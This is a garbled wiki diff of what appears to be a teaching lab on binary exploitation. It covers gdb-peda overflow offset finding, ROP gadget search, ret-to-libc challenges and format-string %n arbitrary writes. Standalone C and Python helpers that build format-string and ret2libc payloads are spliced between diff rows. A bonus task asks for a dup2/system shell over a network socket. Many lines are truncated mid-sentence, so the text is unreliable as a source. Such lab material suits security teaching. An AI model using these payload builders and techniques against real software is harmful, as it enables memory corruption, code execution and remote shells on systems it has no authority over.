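Python's ''%''-formatting pads the same way as C's ''%u'', so it can be used to check how many characters a ''%<width>u'' dummy parameter adds to the ''%n'' counter. The helper name and the value 1337 are arbitrary choices for this sketch. Note the catch: the width is only a minimum, so a value with more digits than the width still prints all of them; a 32-bit unsigned value has at most 10 digits, so widths of 10 or more are exact.

```python
def chars_for(width: int, value: int) -> int:
    """Characters printed by '%<width>u' for a 32-bit 'value'."""
    return len(("%" + str(width) + "u") % value)

print(chars_for(10, 1337), chars_for(150, 1337))   # 10 150
print(chars_for(2, 1337))                          # 4: the width is only a minimum
print(chars_for(10, 0xFFFFFFFF))                   # 10: largest 32-bit value has 10 digits
```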
- | A fairly simple overflow, right? How fast can you figure out the offset to the return address? How much padding do you need? | + | An integer number on the x86 architecture is stored in four bytes, which are little-endian ordered, the least significant byte being the first in memory. |
- | There is a shortcut that you can use to figure this out in under 30 seconds without looking at the assembly. | + | So a number like 0x0000014c is stored |
- | A [[ https:// | + | For the counter |
- | + | Example: | |
- | Peda can help you do this. Here's how: | + | < |
- | < | + | unsigned char foo[4]; |
- | gdb-peda$ help pattern_create | + | printf (" |
- | Generate a cyclic pattern | + | |
- | Usage: | + | |
- | pattern_create size [file] | + | |
- | + | ||
- | gdb-peda$ pattern_create 100 | + | |
- | ' | + | |
- | + | ||
- | gdb-peda$ help pattern_offset | + | |
- | Search for offset of a value in cyclic pattern | + | |
- | Usage: | + | |
- | pattern_offset value | + | |
- | + | ||
- | gdb-peda$ pattern_offset AA8A | + | |
- | AA8A found at offset: 76 | + | |
</ | </ | ||
- | Things can even get more complex: if you insert such patterns as input to the program you can search for signs of where it got placed using peda. Here's how to figure out the offset to the return address in 3 commands for the previous program as promised: | + | When the printf function returns, foo[0] contains |
- | <code bash> | + | |
- | # gdb -q ./a | + | |
- | Reading symbols from ./a...(no debugging symbols found)...done. | + | |
- | gdb-peda$ pattern_create 200 | + | |
- | ' | + | |
- | gdb-peda$ run | + | |
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7AAIAAiAA8AAJAAjAA9AAKAAkAALAAlAAMAAmAANAAnAAOAAoAAPAApAAQAAqAARAArAASAAsAATAAtAAUAAuAAVAAvAAWAAwAAXAAxAAYAAyAAZAAzAaaAa0AaBAabAa1A | + | |
- | + | ||
- | Program received signal SIGSEGV, Segmentation fault. | + | |
- | [----------------------------------registers-----------------------------------] | + | |
- | EAX: 0x0 | + | |
- | EBX: 0xf7f97e54 --> 0x1a6d5c | + | |
- | ECX: 0xffffcd49 (" | + | |
- | EDX: 0x64 ('d') | + | |
- | ESI: 0x0 | + | |
- | EDI: 0x0 | + | |
- | EBP: 0x41334141 (' | + | |
- | ESP: 0xffffcd70 (" | + | |
- | EIP: 0x41414541 (' | + | |
- | EFLAGS: 0x10207 (CARRY PARITY adjust zero sign trap INTERRUPT direction overflow) | + | |
- | [-------------------------------------code-------------------------------------] | + | |
- | Invalid $PC address: 0x41414541 | + | |
- | [------------------------------------stack-------------------------------------] | + | |
- | 0000| 0xffffcd70 (" | + | |
- | 0004| 0xffffcd74 (" | + | |
- | 0008| 0xffffcd78 (" | + | |
- | 0012| 0xffffcd7c (" | + | |
- | 0016| 0xffffcd80 (" | + | |
- | 0020| 0xffffcd84 (" | + | |
- | 0024| 0xffffcd88 (" | + | |
- | 0028| 0xffffcd8c (" | + | |
- | 0032| 0xffffcd90 (" | + | |
- | 0036| 0xffffcd94 (" | + | |
- | 0040| 0xffffcd98 (" | + | |
- | 0044| 0xffffcd9c (" | + | |
- | 0048| 0xffffcda0 (" | + | |
- | 0052| 0xffffcda4 (" | + | |
- | 0056| 0xffffcda8 (" | + | |
- | 0060| 0xffffcdac --> 0x6c (' | + | |
- | + | ||
- | [------------------------------------------------------------------------------] | + | |
- | Legend: code, data, rodata, value | + | |
- | Stopped reason: SIGSEGV | + | |
- | 0x41414541 in ?? () | + | |
- | + | ||
- | + | ||
- | + | ||
- | gdb-peda$ pattern_search | + | |
- | Registers contain pattern buffer: | + | |
- | EIP+0 found at offset: 35 | + | |
- | EBP+0 found at offset: 31 | + | |
- | Registers point to pattern buffer: | + | |
- | [ECX] --> offset 0 - size ~100 | + | |
- | [ESP] --> offset 39 - size ~61 | + | |
- | Pattern buffer found at: | + | |
- | 0xffffcd49 : offset | + | |
- | 0xffffd1c6 : offset 23424 - size 4 ($sp + 0x456 [277 dwords]) | + | |
- | 0xffffd1d8 : offset 22930 - size 4 ($sp + 0x468 [282 dwords]) | + | |
- | 0xffffd276 : offset 48535 - size 4 ($sp + 0x506 [321 dwords]) | + | |
- | References to pattern buffer found at: | + | |
- | 0xffffcd20 : 0xffffcd49 ($sp + -0x50 [-20 dwords]) | + | |
- | 0xffffcd34 : 0xffffcd49 ($sp + -0x3c [-15 dwords]) | + | |
+ | But for an address, there are four bytes that we have to control completely. If we are unable to write four bytes at once, we can try to write one byte at a time, four times in a row. | ||
+ | On most CISC architectures it is possible to write to unaligned arbitrary addresses. This can be used to write to the second least significant byte of the memory, where the address is stored. | ||
+ | This would look as follows: | ||
+ | <code C> | ||
+ | unsigned char canary[5]; | ||
+ | unsigned char foo[4]; | ||
+ | memset (foo, 0, sizeof (foo)); | ||
+ | /* 0 * before */ strcpy (canary, " | ||
+ | /* 1 */ printf (" | ||
+ | /* 2 */ printf (" | ||
+ | /* 3 */ printf (" | ||
+ | /* 4 */ printf (" | ||
+ | /* 5 * after */ printf (" | ||
+ | foo[2], foo[3]); | ||
+ | printf (" | ||
+ | canary[1], canary[2], canary[3]); | ||
+ | </ | ||
+ | This returns the output " | ||
+ | By increasing the pointer each time, the least significant byte moves through the memory we want to write to, and allows us to store completely arbitrary data. | ||
+ | As you can see in the first row of the following figure, none of the eight bytes has been touched yet by our overwrite code. | ||
+ | From the second row on we trigger four overwrites, shifted by one byte to the right for every step. | ||
+ | The last row shows the final desired state: we overwrote all four bytes of our foo array, but while doing so, we destroyed three bytes of the canary array. | ||
+ | We included the canary array just to see that we are overwriting memory we do not want to. | ||
+ | {{ : | ||
+ | Although this method looks complex, it can be used to overwrite arbitrary data at arbitrary addresses. | ||
+ | So far, for clarity, we have used only one write per format string, but it is also possible to write multiple times within one format string: | ||
+ | <code C> | ||
+ | strcpy (canary, " | ||
+ | printf (" | ||
+ | 1, (int *) & | ||
+ | 1, (int *) & | ||
+ | printf (" | ||
+ | foo[2], foo[3]); | ||
+ | printf (" | ||
+ | canary[1], canary[2], canary[3]); | ||
</ | </ | ||
+ | We use the ' | ||
+ | So we only have to add 16 characters instead of 32 to get the result we want. | ||
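The character counting that ''%n'' relies on can be checked in isolation with ''snprintf''. This sketch (the helper name ''count_writes'' is hypothetical) uses padding steps of 16, 16, 32 and 64 characters, which yield the bytes 0x10, 0x20, 0x40 and 0x80, and stores each running count in an ''int'' instead of in another buffer. It assumes a libc that still honours ''%n'' in a constant format string, as glibc does.

```c
#include <assert.h>
#include <stdio.h>

/* Prints four padded numbers into a scratch buffer and uses %n to record
 * the running character count after each one. These counts are the values
 * a format-string write would store. Returns the total length. */
static int count_writes(int counts[4])
{
    char sink[256];   /* large enough for 16 + 16 + 32 + 64 characters */

    assert(counts != NULL);
    return snprintf(sink, sizeof sink, "%16u%n%16u%n%32u%n%64u%n",
                    1u, &counts[0], 1u, &counts[1],
                    1u, &counts[2], 1u, &counts[3]);
}
```

Each ''%16u'' of the value 1 prints exactly 16 characters, so the recorded counts are 16, 32, 64 and 128.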
+ | This was a special case, in which all the bytes increased throughout the writes. But we could also write '' | ||
- | ==== Vulnerable function identification | + | Since we write integers and the byte order is little endian, only the least significant byte of each write matters. |
- | As you can see from above, the base pointer gets trashed so backtracing | + | By using counters of 0x80, 0x140, 0x220 and 0x310 characters respectively when “%n” is triggered, we can construct |
- | < | + | The code to calculate the desired number-of-written-chars counter |
- | gdb-peda$ bt | + | < |
- | #0 0x41414541 in ?? () | + | write_byte += 0x100; |
- | #1 0x34414165 in ?? () | + | already_written %= 0x100; |
- | #2 0x41464141 in ?? () | + | padding = (write_byte - already_written) % 0x100; |
- | #3 0x41416641 in ?? () | + | if (padding < 10) |
+ | | ||
</ | </ | ||
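The calculation above can be packaged as a small helper. This is a sketch: the function names are hypothetical, and the ''padding += 0x100'' in the ''padding < 10'' branch is our assumption for the line that is cut off above (it keeps the padding at 10 or more). ''plan_writes'' chains four calls, feeding each new total back in as ''already_written''.

```c
#include <assert.h>

/* Padding for the next "%<padding>u" so that the running output count
 * ends in write_byte. Follows the calculation above; the "+= 0x100" in
 * the padding < 10 branch is an assumption for the truncated last line. */
static unsigned compute_padding(unsigned write_byte, unsigned already_written)
{
    unsigned padding;

    assert(write_byte <= 0xff);
    write_byte += 0x100;
    already_written %= 0x100;
    padding = (write_byte - already_written) % 0x100;
    if (padding < 10)
        padding += 0x100;
    return padding;
}

/* Plans four one-byte writes. start is the number of characters already
 * printed before the first padding; counts[i] receives the running total
 * at the i-th %n, whose least significant byte equals target[i]. */
static void plan_writes(const unsigned char target[4], unsigned start,
                        unsigned pads[4], unsigned counts[4])
{
    unsigned written = start;

    for (int i = 0; i < 4; i++) {
        pads[i] = compute_padding(target[i], written);
        written += pads[i];
        counts[i] = written;
    }
}
```

Planning the bytes 0x80, 0x40, 0x20 and 0x10 from a count of 0 gives running totals of 0x80, 0x140, 0x220 and 0x310, the counters mentioned above, and ''compute_padding(0x7f, 30)'' returns 97, as in the example that follows.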
- | If this program were larger you wouldn' | ||
- | You can set a breakpoint on all declared functions (if the program has not been stripped) using **rbreak** and then ignoring them: | ||
- | <code bash> | ||
- | gdb-peda$ rbreak | ||
- | Breakpoint 1 at 0x80482d4 | ||
- | < | ||
- | Breakpoint 2 at 0x8048310 | ||
- | < | ||
- | Breakpoint 3 at 0x8048320 | ||
- | < | ||
- | Breakpoint 4 at 0x8048330 | ||
- | < | ||
- | Breakpoint 5 at 0x8048340 | ||
- | < | ||
- | Breakpoint 6 at 0x8048370 | ||
- | < | ||
- | Breakpoint 7 at 0x804843f | ||
- | < | ||
- | Breakpoint 8 at 0x8048470 | ||
- | < | ||
- | Breakpoint 9 at 0x80484e0 | ||
- | < | ||
- | Breakpoint 10 at 0x80484e4 | ||
- | < | ||
+ | Where ' | ||
+ | Example: | ||
+ | <code C> | ||
+ | write_byte = 0x7f; | ||
+ | already_written = 30; | ||
+ | write_byte += 0x100; /* write_byte is 0x17f now */ | ||
+ | already_written %= 0x100; /* already_written is 30 */ | ||
- | gdb-peda$ commands | + | /* afterwards padding is 97 (= 0x61) */ |
- | Type commands for breakpoint(s) 1-10, one per line. | + | padding = (write_byte |
- | End with a line saying just " | + | if (padding < 10) |
- | > | + | |
- | >end | + | |
- | + | ||
- | + | ||
- | gdb-peda$ run | + | |
- | Starting program: | + | |
- | warning: the debug information found in "/ | + | |
- | + | ||
- | warning: Could not load shared library symbols for linux-gate.so.1. | + | |
- | Do you need "set solib-search-path" | + | |
- | + | ||
- | Breakpoint 4, 0x08048330 in __libc_start_main@plt () | + | |
- | + | ||
- | Breakpoint 8, 0x08048470 in __libc_csu_init | + | |
- | + | ||
- | Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () | + | |
- | + | ||
- | Breakpoint 1, 0x080482d4 in _init () | + | |
- | + | ||
- | Breakpoint 6, 0x08048370 in __x86.get_pc_thunk.bx () | + | |
- | + | ||
- | Breakpoint 7, 0x0804843f in main () | + | |
- | + | ||
- | Breakpoint 2, 0x08048310 in read@plt () | + | |
- | + | ||
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfAA5AAGAAgAA6AAHAAhAA7 | + | |
- | + | ||
- | Program received signal SIGSEGV, Segmentation fault. | + | |
- | 0x41414541 in ?? () | + | |
</ | </ | ||
+ | Now a format string of “%97u” would increase the ' | ||
+ | The final check, whether the padding is below ten, deserves some attention. A simple integer output, such as " |
+ | If the required length is larger than the padding we specify, say we want to output ' | ||
+ | By ensuring our padding is always at least 10, we can keep an accurate count in ‘already_written’ at all times, |
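The reason for the lower bound of 10 can be checked with ''snprintf(NULL, 0, ...)'', which only counts characters. In this sketch (hypothetical helper ''printed_len'', assuming a 32-bit ''unsigned int'' whose largest value has 10 digits), a width of at least 10 always produces exactly ''width'' characters, while a smaller width lets a long value overflow it and throw off ''already_written''.

```c
#include <assert.h>
#include <stdio.h>

/* Returns how many characters "%<width>u" prints for value.
 * snprintf with a NULL buffer and size 0 writes nothing and only counts. */
static int printed_len(int width, unsigned value)
{
    int n;

    assert(width >= 0);
    n = snprintf(NULL, 0, "%*u", width, value);
    assert(n >= 0);
    return n;
}
```

For example, ''printed_len(5, 4294967295u)'' is 10, not 5, whereas ''printed_len(10, 4294967295u)'' and ''printed_len(97, 30u)'' match their widths.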
- | ==== ROP payload debugging | + | ==== A general method to exploit format strings vulnerabilities ==== |
- | When you know what the offending function is, disassemble it and break on " | + | All that remains to exploit such vulnerabilities in practice is to put the arguments on the stack in the right order and use a stackpop sequence to increase the stack pointer. |
- | <code bash> | + | It should look like: |
- | gdb-peda$ pdis main | + | < |
- | Dump of assembler code for function main: | + | <stackpop><dummy-addr-pair * 4><write-code> |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | End of assembler dump. | + | |
- | gdb-peda$ b *0x08048467 | + | |
- | Breakpoint 1 at 0x8048467 | + | |
- | + | ||
- | + | ||
- | AAAaAA0AABAAbAA1AACAAcAA2AADAAdAA3AAEAAeAA4AAFAAfA | + | |
- | [----------------------------------registers-----------------------------------] | + | |
- | EAX: 0x0 | + | |
- | EBX: 0xf7f97e54 --> 0x1a6d5c | + | |
- | ECX: 0xffffcd49 (" | + | |
- | EDX: 0x64 (' | + | |
- | ESI: 0x0 | + | |
- | EDI: 0x0 | + | |
- | EBP: 0x41334141 (' | + | |
- | ESP: 0xffffcd6c (" | + | |
- | EIP: 0x8048467 (<main+43>: | + | |
- | EFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow) | + | |
- | [-------------------------------------code-------------------------------------] | + | |
- | | + | |
- | 0x804844d | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | => 0x8048467 < | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | | + | |
- | [------------------------------------stack-------------------------------------] | + | |
- | 0000| 0xffffcd6c | + | |
- | 0004| 0xffffcd70 --> 0x80484cf (< | + | |
- | 0008| 0xffffcd74 --> 0xf7f56be6 ("/ | + | |
- | 0012| 0xffffcd78 --> 0xf7e25c00 (< | + | |
- | + | ||
- | + | ||
- | gdb-peda$ patto AEAAeAA4AAFAAfA | + | |
- | AEAAeAA4AAFAAfA found at offset: 35 | + | |
</ | </ | ||
+ | Where: | ||
+ | * **stackpop** The sequence of stack-popping parameters that increases the stack pointer. Once the stackpop has been processed, the format function's internal stack pointer points to the beginning of the dummy-addr-pair strings. | ||
+ | * **dummy-addr-pair** Four pairs of dummy integer values and addresses to write to. The addresses increase by one with each pair; the dummy integer value can be anything that does not contain NUL bytes. | ||
+ | * **write-code** The part of the format string that actually does the writing to the memory, by using ' | ||
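The layout above can be assembled byte by byte. This is a sketch under stated assumptions, with hypothetical helper names: each stackpop element is ''%08x'' (pops one 32-bit word and prints exactly 8 characters), the dummy value is 0x41414141, addresses are stored little endian as on x86, and ''pads[]'' were computed beforehand. The target addresses must not contain NUL or ''%'' bytes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Stores v at out[pos..pos+3] in little-endian order (x86 assumption). */
static size_t put_le32(unsigned char *out, size_t pos, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[pos + i] = (unsigned char)(v >> (8 * i));
    return pos + 4;
}

/* Characters printed before the first %u of the write-code: 8 per "%08x"
 * plus the 32 raw bytes of the four pairs, which are printed literally. */
static unsigned chars_before_write_code(unsigned n_pops)
{
    return n_pops * 8 + 32;
}

/* Builds <stackpop><dummy-addr-pair * 4><write-code> into out.
 * Returns the payload length, or 0 if cap is too small. */
static size_t build_fmt(unsigned char *out, size_t cap, unsigned n_pops,
                        uint32_t target, const unsigned pads[4])
{
    size_t pos = 0;

    assert(out != NULL);
    for (unsigned i = 0; i < n_pops; i++) {
        if (cap - pos < 4)
            return 0;
        memcpy(out + pos, "%08x", 4);
        pos += 4;
    }
    for (uint32_t i = 0; i < 4; i++) {
        if (cap - pos < 8)
            return 0;
        pos = put_le32(out, pos, 0x41414141u);  /* dummy, consumed by %u */
        pos = put_le32(out, pos, target + i);   /* address, consumed by %n */
    }
    for (int i = 0; i < 4; i++) {
        /* "%%%uu%%n" expands to e.g. "%16u%n" */
        int n = snprintf((char *)out + pos, cap - pos, "%%%uu%%n", pads[i]);
        if (n < 0 || (size_t)n >= cap - pos)
            return 0;
        pos += (size_t)n;
    }
    return pos;
}
```

When computing the paddings, the running count must start at ''chars_before_write_code(n_pops)'' rather than 0, because the stackpop output and the raw pair bytes are printed first.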
- | Then you can break on all called functions or step as needed | + | The write code has to be modified |
- | + | ==== Direct Parameter Access ==== | |
- | + | There is a huge simplification which is known as ' | |
- | ==== checksec | + | method to format string exploitation. |
- | <code bash> | + | The direct parameter access is controlled by the '$' qualifier: |
- | gdb-peda$ checksec | + | <code C> |
- | CANARY | + | printf (" |
- | FORTIFY | + | |
- | NX : ENABLED | + | |
- | PIE : disabled | + | |
- | RELRO : Partial | + | |
</ | </ | ||
+ | Prints ' | ||
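Positional ''%N$'' conversions are a POSIX extension to C's printf (ISO C does not define them) and are supported by glibc. The sketch below, with hypothetical helper names, shows the two properties the exploit relies on: arguments can be picked in any order, and one argument can be reused. POSIX asks that every argument up to the highest one used is referenced, which both format strings respect.

```c
#include <assert.h>
#include <stdio.h>

/* Prints three strings in reverse order with %N$ conversions.
 * Arguments 1..3 are all referenced, as POSIX requires. */
static int reverse3(char *out, size_t cap, const char *a, const char *b,
                    const char *c)
{
    assert(out != NULL && cap > 0);
    return snprintf(out, cap, "%3$s %2$s %1$s", a, b, c);
}

/* Uses argument 1 twice; no extra arguments have to be consumed. */
static int twice(char *out, size_t cap, int v)
{
    assert(out != NULL && cap > 0);
    return snprintf(out, cap, "%1$d-%1$d", v);
}
```

''reverse3'' with "a", "b", "c" produces "c b a", and ''twice'' with 7 produces "7-7".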
- | ==== gadget finding in peda | + | < |
- | Apart from **objdump** which only finds aligned instructions, | + | char foo[4]; |
- | < | + | printf (" |
- | gdb-peda$ start | + | " |
- | .... | + | " |
- | gdb-peda$ dumprop | + | " |
- | Warning: this can be very slow, do not run for large memory range | + | |
- | Writing ROP gadgets to file: a-rop.txt ... | + | (int *) &foo[0], (int *) &foo[1], |
- | 0x8048467: ret | + | (int *) &foo[2], (int *) &foo[3]); |
- | 0x804835d: iret | + | |
- | 0x804838f: repz ret | + | |
- | 0x80483be: ret 0xeac1 | + | |
- | 0x80483a9: leave; ret | + | |
- | 0x80485b4: inc ecx; ret | + | |
- | 0x80484cf: pop ebp; ret | + | |
- | 0x80482f5: pop ebx; ret | + | |
- | 0x80484df: nop; repz ret | + | |
- | 0x80483a8: ror cl,1; ret | + | |
- | 0x804838e: add dh,bl; ret | + | |
- | 0x80483e5: ror cl,cl; ret | + | |
- | 0x8048465: add cl,cl; ret | + | |
- | 0x804840b: leave; repz ret | + | |
- | 0x8048371: sbb al,0x24; ret | + | |
- | 0x80485b3: adc al,0x41; ret | + | |
- | 0x8048370: mov ebx,[esp]; ret | + | |
- | 0x80484de: nop; nop; repz ret | + | |
- | 0x80483a7: call eax; leave; ret | + | |
- | 0x80483e4: call edx; leave; ret | + | |
- | 0x804840a: add ecx,ecx; repz ret | + | |
- | 0x80484ce: pop edi; pop ebp; ret | + | |
</ | </ | ||
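Write-code in this style can be generated instead of typed by hand. The sketch below (hypothetical helper ''build_dpa_code'') emits one ''%<v>$<pad>u%<a>$n'' pair per byte, reusing parameter ''value_idx'' for every padding and taking consecutive address parameters from ''first_addr_idx''. In a real exploit these indices are the stack positions of the dummy value and the addresses, which you have to find first; the paddings would come from a calculation like the one in the previous section.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Builds "%<value_idx>$<pad>u%<addr_idx>$n" four times, with addr_idx
 * running from first_addr_idx to first_addr_idx + 3. Returns the string
 * length, or -1 if out (cap bytes) is too small. */
static int build_dpa_code(char *out, size_t cap, unsigned value_idx,
                          unsigned first_addr_idx, const unsigned pads[4])
{
    size_t pos = 0;

    assert(out != NULL && cap > 0);
    out[0] = '\0';
    for (unsigned i = 0; i < 4; i++) {
        char piece[48];
        int n = snprintf(piece, sizeof piece, "%%%u$%uu%%%u$n",
                         value_idx, pads[i], first_addr_idx + i);
        if (n < 0 || (size_t)n >= sizeof piece || pos + (size_t)n >= cap)
            return -1;
        memcpy(out + pos, piece, (size_t)n + 1);  /* copy including the NUL */
        pos += (size_t)n;
    }
    return (int)pos;
}
```

With ''value_idx'' 1, ''first_addr_idx'' 2 and paddings 16, 16, 32, 64 it produces ''%1$16u%2$n%1$16u%3$n%1$32u%4$n%1$64u%5$n''; no stackpop is needed because each parameter is addressed directly.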
- | A finer-grained search is: | ||
- | <code bash> | ||
- | gdb-peda$ asmsearch "pop ? ; ret" | ||
- | 0x080482f5 : (5bc3) pop | ||
- | 0x080484cf : (5dc3) pop | ||
- | 0x080484f6 : (5bc3) pop | ||
- | gdb-peda$ asmsearch "pop ? ; pop ? ; ret" | + | ==== Generalizing format string exploits ==== |
- | 0x080484ce | + | The '' |
+ | In general, any system where user input affects program execution and data access in a custom way can be susceptible to such a vulnerability. Other specialized examples can be considered: | ||
+ | * SQL injections | ||
+ | * XSS injections | ||
+ | ===== Tasks ===== | ||
- | gdb-peda$ asmsearch "call ?" | + | ==== Stack Canaries ==== |
- | 0x080483a7 : (ffd0) call | + | |
- | 0x080483e4 : (ffd2) call | + | |
- | 0x0804842f : (ffd0) call | + | |
- | </ | + | Download the archive with the tasks at the top of the page. The binaries should be fairly easy to reverse engineer. You can use any tool. |
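The byte patterns in the asmsearch output above (5b c3 for pop ebx; ret, and 5f 5d c3 for pop edi; pop ebp; ret) can also be found with a plain byte scan. This sketch (hypothetical helper names) only knows the one-byte ''pop r32'' encodings 0x58 to 0x5f and ''ret'' (0xc3). Unlike objdump's linear disassembly it checks every offset, so it also reports unaligned hits, but it is far less complete than peda's search.

```c
#include <assert.h>
#include <stddef.h>

/* True for the one-byte x86 encodings of "pop r32":
 * 0x58 pop eax ... 0x5b pop ebx ... 0x5d pop ebp ... 0x5f pop edi. */
static int is_pop_r32(unsigned char b)
{
    return b >= 0x58 && b <= 0x5f;
}

/* Finds offsets where npops consecutive one-byte pops are followed by
 * ret (0xc3). Stores at most max_hits offsets in hits and returns the
 * total number of matches. */
static size_t find_pop_ret(const unsigned char *code, size_t len, size_t npops,
                           size_t *hits, size_t max_hits)
{
    size_t found = 0;

    assert(code != NULL && npops > 0);
    for (size_t off = 0; off + npops < len; off++) {
        size_t k;

        for (k = 0; k < npops && is_pop_r32(code[off + k]); k++)
            ;
        if (k == npops && code[off + npops] == 0xc3) {
            if (found < max_hits)
                hits[found] = off;
            found++;
        }
    }
    return found;
}
```

Scanning the bytes 90 5f 5d c3 5b c3 with ''npops'' 1 reports offsets 2 and 4, and with ''npops'' 2 reports offset 1. As with 0x080484cf inside 0x080484ce above, every pop; pop; ret also contains a shorter pop; ret.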
- | ==== Anti-anti-debugging and others | + | === Task 1 === |
- | There can be various annoyances in binaries: **ptrace** calls for anti-debugging, | + | |
- | These can all be deactivated using **unptrace** (for ptrace) and **deactive** in peda. | + | |
+ | The '' | ||
+ | === Task 2 === | ||
- | == Challenges | + | The '' |
- | === 01. Challenge - ret-to-libc | + | <note warning> |
+ | You need to use the 32 bit VM to solve the second part of this task. | ||
+ | </ | ||
- | Looks good! Let's get serious and do something useful with this. | + | <note warning> |
+ | '' | ||
+ | </ | ||
- | Continue working in the '' | + | <note tip>In case you need some help on these, please take a look at the {{:session: |
- | The final goal of this task is to bypass the NX stack protection and call '' | ||
- | | + | ==== Task 3 - Format Strings ==== |
- | - Return to '' | + | Download the archive |
- | - Find the offset | + | |
- | - Make the binary | + | |
- | - **(bonus)** The process should '' | + | |
- | - Remember how we had ASLR disabled? The other '' | + | |
- | - Where is '' | + | |
<note important> | <note important> | ||
- | //Hint//: Use '' | + | The difficulty of the task associated with each binary increases with the number of the binary. |
</ | </ | ||
- | + | < | |
- | < | + | shows you the invalid address associated |
- | //Hint//: When you will finally attack this, '' | + | |
</ | </ | ||
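A sketch of the stack layout a 32-bit ret-to-libc overflow usually needs, under assumptions: the function to call is libc's ''system()'' with a pointer to a "/bin/sh" string, ''exit()'' serves as its return address for a clean exit, and the addresses and padding length are parameters you have to find yourself (for example with gdb). The helper names are hypothetical; adapt the layout to what the task actually asks for.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Stores v at out[pos..pos+3] in little-endian order (x86). */
static size_t put_dw(unsigned char *out, size_t pos, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[pos + i] = (unsigned char)(v >> (8 * i));
    return pos + 4;
}

/* Classic 32-bit ret-to-libc payload:
 *   [pad x 'A'][system][exit][pointer to "/bin/sh"]
 * When the overflowed function returns, it jumps to system(), which sees
 * exit as its return address and the string pointer as its argument.
 * Returns the payload length, or 0 if cap is too small. */
static size_t build_ret2libc(unsigned char *out, size_t cap, size_t pad,
                             uint32_t system_addr, uint32_t exit_addr,
                             uint32_t binsh_addr)
{
    size_t pos;

    assert(out != NULL);
    if (cap < 12 || pad > cap - 12)
        return 0;
    memset(out, 'A', pad);
    pos = put_dw(out, pad, system_addr);
    pos = put_dw(out, pos, exit_addr);
    return put_dw(out, pos, binsh_addr);
}
```

When ''system()'' returns into ''exit()'', the exit status is whatever word follows the string pointer on the stack. With ASLR enabled, the libc addresses change on every run and have to be leaked or otherwise recovered first.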
- | === 02. Challenge - no-ret-control | ||
- | |||
- | Go to the '' | ||
- | |||
- | Imagine this scenario: we have an executable where we can overwrite at least 4 bytes of arbitrary memory, but ASLR is turned on, so we cannot reliably change the value of the return address. Sometimes ret is not even executed at the end of a function. | ||
- | |||
- | Alter the execution of '' | ||
- | |||
- | === 03. Challenge - ret-to-plt | ||
- | |||
- | Go to the '' | ||
- | |||
- | '' | ||
- | |||
- | Your task is to build an exploit that makes the application always print the **same second random number**. That is, the first printed random number can be anything, but the second one must be the same on every run. In the sample output below, the second printed random number is always '' |
- | |||
- | <code text> | ||
- | hari@solyaris-home: | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 2070249950. Have fun with it! | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1023098942. Have fun with it! | ||
- | Segmentation fault (core dumped) | ||
- | hari@solyaris-home: | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1152946153. Have fun with it! | ||
- | Hi! Options: | ||
- | 1. Get random number | ||
- | 2. Go outside | ||
- | Here's a random number: 1023098942. Have fun with it! | ||
- | |||
- | </ | ||
- | | ||
- | You can use this Python skeleton for buffer overflow input: | ||
- | |||
- | <file python skel.py> | ||
- | # | ||
- | import struct, sys | ||
- | |||
- | def dw(i): | ||
- | return struct.pack("< | ||
- | |||
- | #TODO update count for your prog | ||
- | pad_count_to_ret = 100 | ||
- | payload = " | ||
- | |||
- | #TODO figure out where to return | ||
- | ret_addr = 0xdeadbeef | ||
- | payload += dw(ret_addr) | ||
- | |||
- | |||
- | #TODO add stuff after the payload if you need to | ||
- | payload += "" | ||
- | |||
- | sys.stdout.write(payload) | ||
- | </ | ||
- | |||
- | **Bonus**: The process should SEGFAULT after printing the second (constant) number. Make it exit cleanly (the exit code does not matter, just no SIGSEGV). | ||
- | |||
- | |||
- | === 04. Challenge - Gadget tutorial | ||
- | |||
- | This task requires you to construct a payload that uses gadgets to call the functions inside the binary so that it prints | ||
- | < | ||
- | Hello! | ||
- | stage A!stage B! | ||
- | </ | ||
- | Then make it print the messages in reverse order: | ||
- | < | ||
- | Hello! | ||
- | stage B!stage A! | ||
- | </ | ||
- | === 2. Bonus Challenge - Echo service | ||
- | This task is a network service that can be exploited. Run it locally and try to exploit it. You'll find that if you call system("/ | ||
- | |||
- | So you will need to do the equivalent of the following in a ROP chain: | ||
- | <code c> | ||
- | dup2(sockfd, | ||
- | dup2(sockfd, | ||
- | system("/ | ||
- | </ | ||
- | |||
- | |||
- | Exploit it first with ASLR disabled and then enabled. |